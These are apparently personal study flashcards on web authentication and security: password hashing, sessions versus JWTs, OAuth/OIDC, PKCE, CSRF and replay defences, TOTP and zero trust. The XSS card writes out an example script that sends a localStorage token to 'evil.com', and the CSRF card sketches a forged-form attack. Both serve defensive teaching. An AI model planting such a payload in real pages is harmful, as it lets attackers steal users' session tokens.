Security & Authentication Flashcards

Question

Which hashing algorithms are safe/unsafe?

Answer 1

DEFINITION: Safe: bcrypt, Argon2, scrypt (Slow). Unsafe: MD5, SHA-1 (Fast). STRATEGY: Use slow algorithms (~500ms) to make brute-forcing expensive. IMPLEMENTATION: Configure 'Work Factor' (e.g., Argon2 iterations=3, memory=64MB) to force the CPU to work hard for every single login attempt.

Answer 2

DEFINITION: Server creates session ID, stores data in DB/Memory, sends ID as cookie. STRATEGY: Stateful. Best for strict security apps (Banking) where instant revocation is needed. IMPLEMENTATION: - Server: Redis SET session:123 '{ user: 5 }'. - Response: Set-Cookie: session_id=123; HttpOnly. - Request: Middleware reads Cookie, looks up Redis.

Answer 3

DEFINITION: Server issues signed token; Server verifies signature but stores nothing. STRATEGY: Stateless. Reduces DB load. Best for Microservices/Mobile. IMPLEMENTATION: - Issue: token = sign({ id: 123 }, PRIVATE_KEY). - Verify: Middleware extracts token, uses PUBLIC_KEY to verify signature math. No DB lookup needed.

Answer 4

DEFINITION: Header, Payload, Signature. STRATEGY: Payload is readable by anyone (Base64). Signature is secure. IMPLEMENTATION: Structure: Base64(Header) . Base64(Payload) . Signature Signature Algorithm Determines Symmetric vs. Asymmetric: HMAC-SHA256 (Hash-Based Message Authentication Code – Secure Hash Algorithm 256-bit) → Symmetric Same shared secret is used to sign and verify. RSA (Rivest–Shamir–Adleman) / ECDSA (Elliptic Curve Digital Signature Algorithm) → Asymmetric Auth service signs using a private key; other services verify using a public key. Signature Creation Steps: Concatenate: Base64(Header) + "." + Base64(Payload) Sign using the algorithm specified in the Header: HMAC → use shared secret. RSA/ECDSA → use private key. Append signature as the third part of the JWT.

Answer 5

DEFINITION: Revocation is hard. You cannot delete a token already on a user's phone. STRATEGY: Use short expiration times + Refresh Tokens. IMPLEMENTATION: Workaround: Implement a 'Deny List' in Redis. If user is banned, add their JWT ID (jti) to Redis with a short TTL.

Answer 6

DEFINITION: Long-lived token used solely to get new Access Tokens. STRATEGY: Limits exposure of the sensitive Access Token. IMPLEMENTATION: Client sends POST /refresh with Refresh Token. Server checks DB. If valid, issues new Access Token (15m) and rotates Refresh Token.

Answer 7

DEFINITION: Framework for Delegated Authorization (e.g., 'Log in with Google'). STRATEGY: Don't handle user passwords. Rely on big providers. IMPLEMENTATION: User redirects to Google -> Agrees -> Google redirects back with ?code=xyz. Backend swaps code for Access Token.

Answer 8

DEFINITION: Identity layer on top of OAuth 2.0 providing an ID Token. STRATEGY: Standardizes how you get user profile info (Identity vs Access). IMPLEMENTATION: OIDC adds an id_token (JWT) to the response. App decodes it to get standard claims like name, email, and picture.

Answer 9

**Resource Owner → The user** Owns the data (for example, your Google Drive files). **Client → The application you’re using** Wants to access your data on your behalf (for example, Notion importing your Google Docs). **Authorization Server → The identity provider** Logs the user in and issues tokens (for example, Google Accounts). **Resource Server → The API holding the user’s data** The actual data system (for example, Google Drive API) IMPLEMENTATION: Client gets token from Auth Server. Client puts token in Header to call Resource Server. Resource Server validates token.

Answer 10

DEFINITION: User logs in -> Auth Server returns Code -> Backend exchanges Code for Token. STRATEGY: Gold Standard. Keeps Access Tokens out of browser URL. IMPLEMENTATION: **Authorization Request:** The client application redirects the user to the authorization server, requesting permission to access specific data. **User Authentication and Consent:** The user logs in to their account on the authorization server. They are then shown the requested permissions and can approve or deny them. **Authorization Code Grant:** The authorization server sends an "authorization code" back to the client application via a redirect URI. This code is not the access token itself. **Token Exchange:** The client application sends the authorization code, along with its own credentials, to the authorization server's token endpoint. **Access Token Issued:** The authorization server validates the code and credentials and, if valid, issues an access token and sometimes a "refresh token" to the client application. **Resource Access:** The client application uses the access token to make requests to the resource server to access the user's data

Answer 11

DEFINITION: HttpOnly Cookie. STRATEGY: Makes token invisible to JavaScript, preventing XSS theft. IMPLEMENTATION: Set-Cookie: token=xyz; HttpOnly; Secure; SameSite=Strict. document.cookie returns empty string to JS, but browser still sends it on requests.

Answer 12

DEFINITION: Injecting malicious scripts into a trusted site. STRATEGY: If successful, attackers steal LocalStorage tokens. IMPLEMENTATION: Attack: in script tags: fetch('evil.com?data='+localStorage.getItem('token')). Like in an insecure comments sections or something. Defense: Content Security Policy (CSP) headers.

Answer 13

Cross-Site Request Forgery DEFINITION: a cyberattack where a malicious website tricks a logged-in user's browser into sending a forged, unwanted request to a trusted web application, exploiting the browser's automatic inclusion of session cookies to perform actions like changing passwords, transferring funds, or making purchases without the user's knowledge. STRATEGY: Exploits cookies being sent automatically. IMPLEMENTATION: Attack: Hidden form on evil.com auto-submits to bank.com/transfer. Browser sends bank cookies. Bank processes it.

Answer 14

DEFINITION: Anti-CSRF Tokens or SameSite cookies. STRATEGY: Require data the browser doesn't send automatically. IMPLEMENTATION: Double Submit Cookie: Server sends random cookie. Client reads it and puts it in Header X-CSRF-Token. Server checks if Cookie == Header.

Answer 15

DEFINITION: Intercepting a valid request and sending it again. STRATEGY: Prevent attackers from repeating a transaction. IMPLEMENTATION: Include timestamp and nonce (random ID) in request. Server rejects if nonce is seen before or timestamp is old.

Answer 16

DEFINITION: Logging in once to access multiple systems. STRATEGY: Centralizes identity (IdP). Avoids credential fatigue. IMPLEMENTATION: User logs into IdP once (cookie set). When visiting App B, App B redirects to IdP. IdP sees cookie and instantly issues token. Cookie is set in browser as http only and is sent every request.

Answer 17

DEFINITION: Proof Key for Code Exchange. Protects OAuth on mobile/public clients. Note: the client secret is not the auth token. And PKCE is not protecting access tokens. It’s protecting the authorization code step before tokens exist. STRATEGY: Replaces static client_secret with dynamic hash. IMPLEMENTATION: **1. Your app generates a random string** Called the code_verifier (e.g., 64-char random value). **2. Your app hashes it** Creates a code_challenge = SHA-256(code_verifier). **3. Redirect user to the IdP** Your app sends: /authorize? response_type=code code_challenge= code_challenge_method=S256 **4. User logs in at the IdP** IdP authenticates the user. **5. IdP redirects back to your app** With an authorization code (NOT the token yet): /callback?code=abc123 **6. Your app exchanges the code for tokens** Your server makes a POST request to the IdP: POST /token { code: "abc123", code_verifier: } **7. IdP verifies PKCE** IdP checks: SHA-256(code_verifier) === code_challenge If true → the request is legitimate. **8. IdP returns tokens** Such as: access_token id_token (if OIDC) refresh_token (optional) | Context: https://chatgpt.com/share/6939830b-1a20-800d-b535-177fb648dbc6

Answer 18

DEFINITION:Symmetric cryptography → Uses one shared secret key for both signing and verification (for example, HMAC: Hash-Based Message Authentication Code). Asymmetric cryptography → Uses a key pair: a private key for signing and a public key for verification (for example, RSA: Rivest–Shamir–Adleman). Use: Asymmetric is safer for Microservices.

Answer 19

DEFINITION: SAML (XML/Enterprise). OIDC (JSON/Modern). STRATEGY: Use SAML for legacy enterprise (AD). OIDC for modern apps. IMPLEMENTATION: SAML sends massive XML response. OIDC sends compact JSON Web Token.

Answer 20

DEFINITION: RBAC (Role-Based Acess Control). ABAC (Attribute-Based Access Control). STRATEGY: RBAC is simple (Admin vs User). ABAC is granular (Time/Location/Dept). IMPLEMENTATION: RBAC: if (user.role == 'admin') ABAC: if (user.dept == resource.dept && time < 5pm)

Answer 21

DEFINITION: API Keys = Project Identity. Bearer Tokens = User Identity. STRATEGY: API Keys for server-to-server. Tokens for users. IMPLEMENTATION: API Key: Header x-api-key: abc. Checked against DB (fast). Bearer Token: Header Authorization: Bearer xyz. Validated via signature.

Answer 22

DEFINITION: Automated injection of breached username/passwords. STRATEGY: Mitigation: Rate Limiting and CAPTCHAs. IMPLEMENTATION: WAF blocks IPs with >10 failed logins/min. Trigger Recaptcha on suspicious attempts.

Answer 23

DEFINITION: Attacker sets user's session ID *before* login. STRATEGY: Always regenerate session ID after login. IMPLEMENTATION: On successful login(), call session.regenerate() to issue fresh ID, invalidating the attacker's planted ID.

Answer 24

DEFINITION: Shared Secret + Current Time = 6 digit code. STRATEGY: Offline 2FA. IMPLEMENTATION: HMAC-SHA1(Secret, timestamp/30). Truncate hash to 6 digits. Server and Phone do same math.

Answer 25

DEFINITION: Random string sent to Auth Server and returned unchanged. STRATEGY: Prevents CSRF in OAuth flow. IMPLEMENTATION: Client saves state=xyz. Redirects. On return, checks if url_param.state == stored_state.

Answer 26

DEFINITION: Passwordless authentication → User logs in through a one-time URL sent to their email instead of entering a password. STRATEGY: Low friction: No password to remember. Reduced attack surface: Eliminates password reuse, brute force attacks, and credential stuffing. IMPLEMENTATION: Generate a random, single-use login token. Store it in Redis with a TTL (Time To Live) of 15 minutes. Email the login link containing the token to the user. When the user clicks the link: Validate the token in Redis. Create a session for the user. Delete the token to prevent reuse.

Answer 27

DEFINITION: JSON Web Key Set. Endpoint publishing Public Keys. STRATEGY: Automates key rotation. IMPLEMENTATION: Auth Server exposes /.well-known/jwks.json. Resource Server downloads it to verify JWT signatures. Yes, effectively. The public keys (JWKS) allow the Identity Provider (IdP) to prove that it was the one that created the token. Here is the logic: The Private Key (Held by IdP): Only the IdP has this. They use it to "sign" the token. This is like a King using his personal signet ring to stamp a document. The Public Key (Held by You/JWKS): Everyone can see this. You use it to check the signature. The Proof: If the Public Key successfully validates the signature on the token, it mathematically proves that only the entity holding the Private Key (the IdP) could have created it.

Answer 28

DEFINITION: Permissions defining extent of access (read:email). STRATEGY: Principle of Least Privilege. IMPLEMENTATION: Token contains scope: 'read:posts'. API checks if (!token.scope.includes('write')) -> 403.

Answer 29

DEFINITION: Standard for hardware-backed passwordless auth (TouchID/YubiKey). STRATEGY: Phishing-resistant. Private Key never leaves device. IMPLEMENTATION: Device generates Key Pair. Sends Public Key to server. To auth, device signs challenge with Private Key.

Answer 30

DEFINITION: Random string with no meaning. Requires server lookup (Introspection). Layer on top of Oauth2.0 STRATEGY: High security control. Instant revocation. IMPLEMENTATION: API receives token -> Calls POST /introspect to Auth Server -> Auth Server checks DB -> Returns active: true. ## Footnote https://docs.secureauth.com/ciam/en/opaque-token--concept,-purpose,-way-it-works.html

Answer 31

1. Definition A padding oracle attack is when an attacker can decrypt information by watching how a system reacts to invalid padding during decryption. The system’s error messages become an “oracle” that leaks information. ⸻ 2. Strategy (How to Prevent It) Use Authenticated Encryption, especially: AES-GCM (Advanced Encryption Standard — Galois/Counter Mode) Why? Because AES-GCM checks integrity before decryption, meaning: • No padding errors are leaked • No useful information is exposed

Answer 32

DEFINITION: Intercepting traffic between client and server. STRATEGY: Enforce HTTPS / HSTS. IMPLEMENTATION: Header Strict-Transport-Security tells browser to refuse HTTP connections. Mobile apps use Cert Pinning.

Answer 33

DEFINITION: ID = Username (Public). Secret = Password (Private). STRATEGY: Native apps cannot store Secrets safely. IMPLEMENTATION: Server-side apps send Auth code, client id, Secret in Basic Auth header. Mobile apps use PKCE instead. Note that during registration, client secret and id are provided to IdP. The client registers with SSO, a client ID is generated that identifies the client and a random secret is also generated, both the SSO and client store this data.

Answer 34

**What it is:** Authorization server hosts an endpoint that lets an API check whether an access token is valid, active, and which user it belongs to. **When or why it is used:** Used when tokens are opaque or when you need to support revoking JWTs or verifying real-time permissions. Note on opacity: Opaque tokens are used when you want central control — the Authorization Server can revoke tokens instantly, change user permissions mid-session, and prevent APIs from trusting outdated or compromised tokens. JWTs cannot be revoked unless APIs check back with the Authorization Server, which defeats their “self-contained” purpose. **Example:** An API receives a token and sends POST /introspect { token } to the Authorization Server, which replies { active: true, sub: "user_123" } so the API knows the request is legitimate.A server endpoint that lets an API check whether an access token is valid, active, and which user it belongs to. When or why it is used: Used when tokens are opaque or when you need to support revoking JWTs or verifying real-time permissions. Example: An API receives a token and sends POST /introspect { token } to the Authorization Server, which replies { active: true, sub: "user_123" } so the API knows the request is legitimate.

Answer 35

DEFINITION: Assume no user/device is trustworthy, even inside network. STRATEGY: Authenticate every request. IMPLEMENTATION: mTLS: Services require client certificates. Identity Aware Proxy: Validates JWT before forwarding to app.

Answer 36

DEFINITION: Privileged entity tricked into misusing authority. STRATEGY: Ensure requestor is authorized for specific target. IMPLEMENTATION: AWS: Use ExternalId in role trust policy to prevent cross-customer role assumption. ExternalId adds a shared secret between your trusted partner and your AWS account.

Answer 37

* **Port 22 blocked** - corporate, school, hotel, or airport networks often restrict SSH bc it’s used for port forwarding and tunneling. * **Ephemeral/CI environments** — runners can’t safely store private keys; HTTPS + tokens is easier. * **Shared or semi-trusted machines** — you don’t want long-lived SSH keys sitting on disk. * **Quick setup on a new device** — HTTPS works immediately; SSH requires key generation + upload. * **Need scoped or revocable permissions** — HTTPS tokens allow fine-grained scopes and expiration. * **Scripts requiring minimal config** — HTTPS avoids SSH agent + known_hosts setup. * **Enterprise governance** — some orgs enforce token-based access for auditability.

Answer 38

Because short-lived tokens limit blast radius. If stolen, they expire quickly and are scope-restricted. SSH keys are long-lived, high-privilege credentials—if the private key is stolen, an attacker has full access until you manually revoke it.

Answer 39

In practice, token issuance sits behind MFA/SSO, so password theft alone can’t mint a new token. Tokens assume credential compromise is possible and reduce damage by being temporary, while SSH keys provide no expiry and no built-in MFA protection.

Answer 40

Humans switch devices, lose laptops, use phones, and use browsers—client certificates don’t migrate cleanly between these contexts. Machines don’t have that problem, so certificate distribution, rotation, and revocation work smoothly in automated environments.

Answer 41

Session-Based Authentication • Stateful: Server stores session in DB/Memory (e.g., Redis). • Revocation: Instant—delete session server-side. • Security: Cookie holds only opaque ID (no readable data). • Use Case: Banking, high-security apps, short lived interactive sessions. JSON Web Token (JWT) Authentication • Stateless: No server-side storage; token is self-contained. • Revocation: Hard—valid until expiration unless you add blacklists. • Security: Claims are readable; if stolen, attacker has access until expiry. • Use Case: Distributed systems, microservices, APIs, large-scale architectures.

Answer 42

Every service must share one secret key. If any service is compromised, attacker can forge tokens. Asymmetric avoids this: Auth service signs with private key; others only verify using public key, preventing token forgery.

Answer 43

Data at rest (databases, disks, backups) → fast + efficient. Data in transit after handshake (TLS switches to AES for bulk encryption). Small, closed systems where only 1–2 services verify (HMAC: Hash-Based Message Authentication Code). Webhook/API key verification (simple 1:1 trust). Low-power devices (IoT) where asymmetric math is expensive.

Answer 44

What it is: A delegated authorization framework — it lets an app access a user’s data on another service without knowing their password. When or why it’s used: Used when you only need API access, not user identity. OAuth gives you access tokens, not information about who the user is. Example: An app uses GitHub OAuth to get permission to read a user’s repositories. GitHub returns an access token; the app does not automatically know the user's email or profile unless it calls a separate endpoint.

Answer 45

**What it is:** OAuth 2.0 plus an identity layer, adding an ID Token (a JWT) that contains verified user profile claims. **When or why it’s used:** Used when you want to authenticate the user (log them in) and receive standardized info like name, email, and unique user ID. **Example:** “Sign in with Google” returns both: an access token (for calling Google APIs) an ID token (for identifying who logged in) Your app decodes the ID token to know things like: "sub": "12345", "email": "user@gmail.com" OIDC is the layer on top of OAuth2.0 - a strictly authorization tool - that enables authenticatin

Answer 46

SSH is both. 1. SSH is a communication protocol It creates a secure, encrypted channel over an insecure network. All data sent between client and server is encrypted (AES, ChaCha20, etc.). 2. SSH is also an authentication protocol It authenticates: The server (via host keys) The user (via passwords or public keys) It does not use “tokens”; it uses cryptographic challenges.

Security & Authentication Flashcards

(70 cards)